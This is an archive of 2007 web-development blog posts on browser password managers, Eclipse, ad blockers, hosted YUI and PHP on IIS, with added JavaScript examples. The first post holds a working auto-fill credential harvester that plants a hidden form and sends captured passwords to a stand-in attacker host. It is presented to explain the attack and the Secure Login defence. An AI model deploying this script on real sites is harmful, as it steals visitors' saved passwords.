Archive for 'Web Dev/Tech'
New Trick to get Browsers to Expose Passwords
Posted on July 25, 2007, under Web Dev/Tech.
CyberNet News wrote a post titled “Firefox Password Manager Exposes Passwords - Most Secure Browser?” which talks about a new phishing technique.
Essentially, if you use a password manager like the one in Firefox, which auto-fills the username and password fields in a form, you are exposed. Once the form is auto-populated, any script running on that page can read the credentials straight out of the form fields and send them wherever it likes. If you read the details, you will see that the attack only works on the same domain the password was saved for, because the manager only fills forms on that domain; the attacker therefore needs to get script running there, through a cross-site scripting hole or a site that lets its users publish their own HTML and JavaScript. Think about how many sites fit that description: Blogger (Google account info), MySpace, etc. The article gives three possible solutions, including not using the password manager and turning off JavaScript.
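The harvesting trick described above, as an added JavaScript illustration (not code from the CyberNet or heise write-ups): a script running on the same origin as a saved login plants a hidden login form, polls until the password manager has filled it, and packs the result into a beacon URL. The collector address, the field names and the stand-in form object used to run it under Node are all assumptions for the example; nothing is contacted.

```javascript
// Added illustration of auto-fill credential harvesting. In a browser you
// would call plantHiddenForm(document); under Node the same polling logic
// runs against a constructed stand-in form.

const COLLECTOR = 'http://attacker.invalid/collect'; // hypothetical, never contacted

// Read the two fields; returns null until the manager has filled both.
function credentialsFromForm(form) {
  const user = form.querySelector('input[name="username"]');
  const pass = form.querySelector('input[name="password"]');
  if (!user || !pass || !user.value || !pass.value) return null;
  return { username: user.value, password: pass.value };
}

// Query string an attacker would hang off an <img> or <script> URL.
function exfilUrl(base, creds) {
  const q = new URLSearchParams({ u: creds.username, p: creds.password });
  return `${base}?${q.toString()}`;
}

// Auto-fill happens after load and is asynchronous, so poll for it.
// `setTimer` is injectable so the loop can be driven without real timers.
function waitForAutofill(form, onFilled, opts = {}) {
  const { intervalMs = 250, maxTries = 40, setTimer = setTimeout } = opts;
  let tries = 0;
  function tick() {
    const creds = credentialsFromForm(form);
    if (creds) { onFilled(creds); return; }
    if (++tries < maxTries) setTimer(tick, intervalMs); // give up after maxTries
  }
  tick();
}

// Browser side: a hidden form with the same field names and input types as
// the real login form is enough for the manager to match and fill it.
function plantHiddenForm(doc) {
  const form = doc.createElement('form');
  form.style.display = 'none';
  for (const [name, type] of [['username', 'text'], ['password', 'password']]) {
    const input = doc.createElement('input');
    input.name = name;
    input.type = type;
    form.appendChild(input);
  }
  doc.body.appendChild(form);
  waitForAutofill(form, (creds) => {
    doc.createElement('img').src = exfilUrl(COLLECTOR, creds); // classic image beacon
  });
  return form;
}

// Constructed stand-in for a form element so the logic runs under Node.
function fakeForm(values = {}) {
  const fields = {
    username: { value: values.username || '' },
    password: { value: values.password || '' },
  };
  return {
    fields,
    querySelector(sel) {
      const m = /name="(\w+)"/.exec(sel);
      return m ? fields[m[1]] || null : null;
    },
  };
}

if (typeof document !== 'undefined') {
  plantHiddenForm(document);
} else {
  // Offline run: the "manager" fills the form on the first re-poll.
  const form = fakeForm();
  waitForAutofill(form, (creds) => console.log('harvested:', exfilUrl(COLLECTOR, creds)), {
    setTimer(fn) { form.fields.username.value = 'alice'; form.fields.password.value = 's3cret'; fn(); },
  });
}
```

The hidden form is the whole trick: the manager matches on domain and field types, not on whether the form is the one the user sees. Anything that makes the fill wait for a user action, as Secure Login does, breaks the polling loop, since the script never sees non-empty fields.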
The third option was to use a browser extension called Secure Login. Secure Login hooks into Firefox’s Password Manager: all the credentials are still stored and handled by Firefox, but Secure Login stops usernames and passwords from being auto-populated into a form. It gives you a visual cue that it can fill in the form, and you must then initiate the populating of the fields yourself. That gives you a stop-gap in case you don’t want the form auto-populated right away. I’ve used it for a day, and the extension works pretty well.
User comments on the article said Opera has had this feature built in for a while, and suggested using Opera instead. While it’s great to see Opera was ahead of the game, I personally haven’t been able to get comfortable enough with Opera yet to consider a switch. It just doesn’t feel natural to me for some reason when I’m surfing.
If you happen to be like me, and use Firefox and its password manager, take a look at the Secure Login extension to help prevent this new phishing technique.
10 things to know before you register a domain name
Posted on June 28, 2007, under Security, Web Dev/Tech.
Sometimes I get asked what is involved in registering a domain name, and whether there is anything to be careful of. I just ran across this site, which does a good job of listing most of the concerns to watch for when choosing an organization to register a domain name with:
10 things you MUST know before you register a domain name with anyone
Which side are you on?
Posted on May 9, 2007, under Web Dev/Tech.
In my career involved with web development, I’ve gone from more Microsoft-oriented development (ASP, Commerce Server, etc) to Open Source/Java (Apache, PHP, MySQL, JSPs, WebSphere, etc), to getting more involved with Microsoft again (SharePoint, .NET/C#, SQL, IIS). The latter transition is still an ongoing occurrence – my time is split between Microsoft and LAMP, but over the last year and a half I’ve come to reflect on some things and the way I viewed the “opposing” camp (whichever it may have been at the time).
At this juncture in my career I find that I resonate very much with the summary of this post by Jeff Atwood:
As a software developer, you’re doing yourself a disservice by pledging allegiance to anything other than yourself and your craft– whether it’s Microsoft or the principle of free software. Stop with the us vs. them mentality.
Competition is good and is what drives innovation; I am a firm believer in this principle. I even understand strongly disliking a product. There are major products I don’t like and don’t want to support/use. I also have my share of distrust for the “good will/do no evil” of many of the major players.
But if you are someone who has an emotional disdain for anything written in a certain language just because it is Microsoft/Open Source/”not Microsoft”, I don’t really want to have you on my team. That attitude tells me you’re more about protecting your personal “religion” than matching business value with a job well done. Instead of looking at business value and working as a team to apply technology towards the solution, you’re about protecting your technology dogma.
No thank you. You’re not a fun person to work with.
Removing recent workspaces in Eclipse menu
Posted on March 29, 2007, under Web Dev/Tech.
When Eclipse 3.2 launches, it asks you which workspace you would like to work in. To help you remember the workspaces you’ve been in, Eclipse provides you a drop-down menu of workspaces you have recently been in.
If you ever find that you have a defunct workspace listed in the menu, as I did, here is how you can manually remove it. Do this with Eclipse closed, since Eclipse rewrites the file when it exits and would undo your edit.
- Find the following file: (eclipse-home)\configuration\.settings\org.eclipse.ui.ide.prefs
- Open the file, and look for the line that starts with: RECENT_WORKSPACES
- The workspaces are separated by commas, so delete whichever workspace you no longer want in the drop-down menu.
- Save the file.
Enjoy a clean startup menu!
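The same edit as a small script, added here as an example and not part of Eclipse. It assumes the Eclipse 3.2 comma-separated format described above and the backslash escaping Java’s Properties.store writes for drive-letter paths (C\:\\work\\old for C:\work\old); the sample file contents are constructed.

```javascript
// Added helper: drop one entry from the RECENT_WORKSPACES line of
// org.eclipse.ui.ide.prefs. Assumes the 3.2-era comma-separated format.

// Undo the Properties-style escaping (\: and \\) so callers pass plain paths.
// Enough for drive-letter paths; \uXXXX escapes are not handled.
function unescapeProp(s) {
  return s.replace(/\\(.)/g, '$1');
}

// Pure function over the file text: returns the new text and a count of
// removed entries. Windows paths compare case-insensitively.
function removeRecentWorkspace(prefsText, workspacePath) {
  const nl = prefsText.includes('\r\n') ? '\r\n' : '\n';
  const lines = prefsText.split(/\r?\n/);
  let removed = 0;
  const out = lines.map((line) => {
    if (!line.startsWith('RECENT_WORKSPACES=')) return line;
    const entries = line.slice('RECENT_WORKSPACES='.length).split(',');
    const kept = entries.filter((entry) => {
      const match = unescapeProp(entry).toLowerCase() === workspacePath.toLowerCase();
      if (match) removed++;
      return !match;
    });
    return 'RECENT_WORKSPACES=' + kept.join(',');
  });
  return { text: out.join(nl), removed };
}

// Edit the file in place, keeping a .bak copy. Run with Eclipse closed.
function removeFromPrefsFile(prefsFile, workspacePath) {
  const fs = require('fs');
  const original = fs.readFileSync(prefsFile, 'utf8');
  const { text, removed } = removeRecentWorkspace(original, workspacePath);
  if (removed > 0) {
    fs.copyFileSync(prefsFile, prefsFile + '.bak');
    fs.writeFileSync(prefsFile, text);
  }
  return removed;
}

// Constructed sample of the relevant lines, for an offline run.
const SAMPLE = [
  'RECENT_WORKSPACES=C\\:\\\\work\\\\current,C\\:\\\\work\\\\old,D\\:\\\\ws',
  'RECENT_WORKSPACES_PROTOCOL=2',
  'eclipse.preferences.version=1',
].join('\n');

console.log(removeRecentWorkspace(SAMPLE, 'C:\\work\\old').text);
```

Call removeFromPrefsFile('C:\\eclipse\\configuration\\.settings\\org.eclipse.ui.ide.prefs', 'C:\\work\\old') for the real file. The RECENT_WORKSPACES_PROTOCOL line records the format; newer Eclipse releases changed the separator, so check that line before running this against anything other than 3.2-era prefs.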
Firefox - Opening searches in a new tab
Posted on March 28, 2007, under Web Dev/Tech.
Best Firefox tip I’ve seen in awhile.
GoodSearch: Powered by Yahoo! - Stat Tracking by Google
Posted on March 21, 2007, under Web Dev/Tech.
I came across GoodSearch today, which is a really cool concept. Select the charity of your choice, and for every search about $0.01 will be contributed to your chosen charity. I debated on a couple different organizations, but am currently choosing Tiny Stars.
The weird thing is, the GoodSearch search engine is powered by Yahoo, but I happened to notice they are embedding Google Analytics for site tracking. Weird! That reminds me of a kid in junior high who used to deck himself out in complete Nike outfits, and then wear Reebok shoes. This is exactly like that, but not.
Use Adblock Plus without Filterset.G Updator
Posted on March 12, 2007, under Web Dev/Tech.
In a previous post, I mentioned what I thought was an issue with the Adblock Plus extension for Mozilla Firefox. The extension’s author, Wladimir Palant, was kind enough to post a comment in response. He tracked down the issue to a faulty rule in the Filterset.G adblocking ruleset, and had submitted a bug report with the Filterset.G group.
However, he also pointed me to part of the Adblock Plus FAQ that says it’s not good to use the Adblock Filterset.G Updater extension with Adblock Plus, and that there are actually some conflicts. I had been using them together for quite some time and didn’t realize this! The recommendation is to pick a different, supported list to subscribe to inside of the Adblock Plus extension.
After reading Mr. Palant’s comment, I uninstalled the Filterset.G Updater extension, cleared the existing rules in Adblock Plus to start over, and subscribed to EasyList (USA) inside of the Adblock Plus options. Things look good!
Think before you embed hosted YUI
Posted on February 27, 2007, under Web Dev/Tech.
Recently, Yahoo announced they would allow free hosting of their Yahoo! User Interface (YUI) JavaScript and CSS libraries to any site which used them. Yahoo promises gzip compression, smart caching, and the stability of the Yahoo network if you embed their javascript and css files. After seeing the announcement, I read several posts which declared this the best thing ever for JavaScript libraries, and that this meant Yahoo had “won” the library wars.
If you use YUI, or were thinking about it, this may all sound great! Just reference their hosted files in your site and you’re good to go! However, be careful. You are opening up your site to issues you may not have considered. For example:
Security
If you embed a script hosted by a third party into your web site, you are giving that host first-class access to your pages and to everyone who visits them. The script runs with your page’s origin, so whoever controls the file on Yahoo’s server can read and change your pages, call your own scripts, read any cookie your site sets that isn’t marked HttpOnly, and make requests to your site with the visitor’s session.
Sometimes you actually do want to give a third party this kind of access. For instance, to track web statistics for your site, you can embed WebTrends’ own script from their servers; because it runs in your page, it can set a first-party cookie that appears to come from your domain. WebTrends does this so more users will accept the cookie, since it looks like it is only being used by your domain. In that case the access is a feature, and could be a selling point for you as you look for web analytics services.
However, in the case of something like a hosted, UI-based JavaScript library, you need to really think about whether the domain hosting the file needs that kind of access to your web site and your visitors.
Reliability
If Yahoo changes their API in a way that conflicts with your scripts, or introduces a bug into the hosted files, your web site breaks. Any change they make to those files goes live on your site immediately; there is no ‘dev’ environment in which to test it first. You have no control.
Privacy
This is related to the bullet on security, but Yahoo can now track all of your visitors for their purposes. They can track any information available through regular web traffic logs, since the files are being pulled from their web site. They potentially also have the ability to read and set cookies.
Yahoo has a paragraph at the bottom of the blog post making the announcement that says:
“Usage of this service will be recorded in Yahoo!’s Web traffic logs. We can assure you that our intent is simply to provide a convenience to the YUI developer community. If the record left in Yahoo!’s logs would compromise the privacy of your users, do not use this service.”
This sounds fairly low-key. However, on the embed page, there is this paragraph under the Terms of Use headline:
“Yahoo!’s hosting of YUI files is covered by all applicable sections of the Terms of Use governing Yahoo! APIs; your use of YUI files from Yahoo!’s servers constitutes an agreement to those terms. Access of YUI files from Yahoo!’s servers will be recorded in Yahoo!’s Web traffic logs. Please be sure that this usage is fully consistent with your own user privacy agreement before deploying YUI files from Yahoo! servers as part of your application.”
Make no mistake; Yahoo plans to garner usage information from your site’s visitors. They even say that you should make sure your site’s privacy statement agrees with theirs before serving their files. You may be alright with this, and it may not bother you or your site’s visitors. However, make sure you understand these privacy issues before embedding their library. Trust is an easy thing to lose, and hard to gain back.
Redundant
Why do you need Yahoo to host script libraries for you? If your server has downtime issues, it’s not going to matter if your visitors can download the YUI or not. If your site is down, it’s down. Considering some of the potential ‘costs’ of embedding from Yahoo’s servers, make sure you have good reason for doing it.
Installing PHP 5 on Windows Server 2003 with IIS 6
Posted on February 13, 2007, under Web Dev/Tech.
If you have the need, here is a great guide on How to install PHP 5.x on Windows Server 2003 with IIS 6.
My experience with PHP has always been on Linux, but now I have PHP 5.2.1 running successfully on a Win2003 machine, talking to a remote SQL Server.
Update: Using the guide above, I could use PHP’s ODBC functions to connect, but I couldn’t use the mssql functions or libraries like MDB2. To get those to work, I needed to make sure I had a recent version of ntwdblib.dll in both my PHP installation directory and the C:\Windows\System32 directory. After running an iisreset, I could connect using both mssql and MDB2.
CIW – Vendor Neutral? Yes. Adblock-safe? No.
Posted on January 23, 2007, under Web Dev/Tech.
I was just sitting down to write a positive article about my recent Certified Internet Webmaster (CIW) certification experience, and then I noticed their home page is messed up in Mozilla Firefox 2.
What’s the deal?? I sent them a message about it. They need to fix that like yesterday.
Update: After a little more testing, I found that the web site does display correctly in Firefox. The issue is with the Adblock Plus and Adblock Filterset.G Updater add-ons. When those extensions are enabled, the CIW home page becomes broken. Apparently the developers at CIW gave some of their featured-navigation images file names like “ad01_start.jpg”. Adblock must see the “ad01” part of the name and block it. That was a poor decision, naming parts of their navigation as though they are external ads. Hopefully they change their naming scheme soon.
Update II: See the first comment below from Wladimir Palant, AdBlock Plus’s creator. The issue is with the Filterset.G subscription add-on, not with AdBlock Plus.
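Why a file named “ad01_start.jpg” gets caught, shown with an added JavaScript example covering both this post and the Adblock Plus post above. It converts filters written in Adblock Plus syntax (the `*` wildcard, the `^` separator, the `||` domain anchor, `|` start/end anchors, and /regex/ filters) into regular expressions and runs a list of constructed URLs through them. The filters and the CIW-like host name are made up for the illustration; the actual Filterset.G rule that hit the CIW page is not on record here. Filter options after `$` and exception rules (`@@`) are not handled.

```javascript
// Added example: Adblock Plus filter syntax -> RegExp, plus a matcher.

// Follows the ABP conversion steps: collapse wildcards, escape everything,
// then re-expand the special characters.
function abpToRegex(filter) {
  const text = filter.split('$')[0]; // strip $options for this demo
  if (text.length > 1 && text.startsWith('/') && text.endsWith('/')) {
    return new RegExp(text.slice(1, -1), 'i'); // a raw regex filter
  }
  const source = text
    .replace(/\*+/g, '*')                  // "**" is just "*"
    .replace(/\^\|$/, '^')                 // "^|" at the end is just "^"
    .replace(/\W/g, '\\$&')                // escape every non-word character
    .replace(/\\\*/g, '.*')                // * : any run of characters
    .replace(/\\\^/g, '(?:[^\\w\\-.%]|$)') // ^ : separator (not letter/digit/_-.%) or end
    .replace(/^\\\|\\\|/, '^[\\w\\-]+:\\/+(?!\\/)(?:[^\\/]+\\.)?') // || : domain anchor
    .replace(/^\\\|/, '^')                 // leading | : start of URL
    .replace(/\\\|$/, '$$')                // trailing | : end of URL
    .replace(/^\.\*/, '')                  // leading/trailing .* are redundant
    .replace(/\.\*$/, '');
  return new RegExp(source, 'i');
}

function matches(filter, url) {
  return abpToRegex(filter).test(url);
}

// First filter in the list that matches, or null if the URL would load.
function blockedBy(filters, url) {
  for (const f of filters) if (matches(f, url)) return f;
  return null;
}

// Constructed URLs: a site's own navigation image with an unlucky name, one
// of its ordinary images, and a genuine ad server.
const URLS = [
  'http://www.ciw.example/images/ad01_start.jpg',
  'http://www.ciw.example/images/logo.jpg',
  'http://adserver.example/banner.gif',
];

// Hypothetical rules: an over-broad substring rule of the kind a community
// list can accumulate, and a properly domain-anchored one.
const OVERBROAD = ['/ad0'];
const ANCHORED = ['||adserver.example^'];

for (const url of URLS) {
  console.log(url, '| overbroad:', blockedBy(OVERBROAD, url), '| anchored:', blockedBy(ANCHORED, url));
}
```

The unanchored `/ad0` hits anything with “/ad0” in the path, including the site’s own navigation, while `||adserver.example^` only matches that host and its subdomains. When a page breaks under an ad blocker, dropping the candidate URLs through the subscribed rules this way finds the offending filter far faster than guessing from file names.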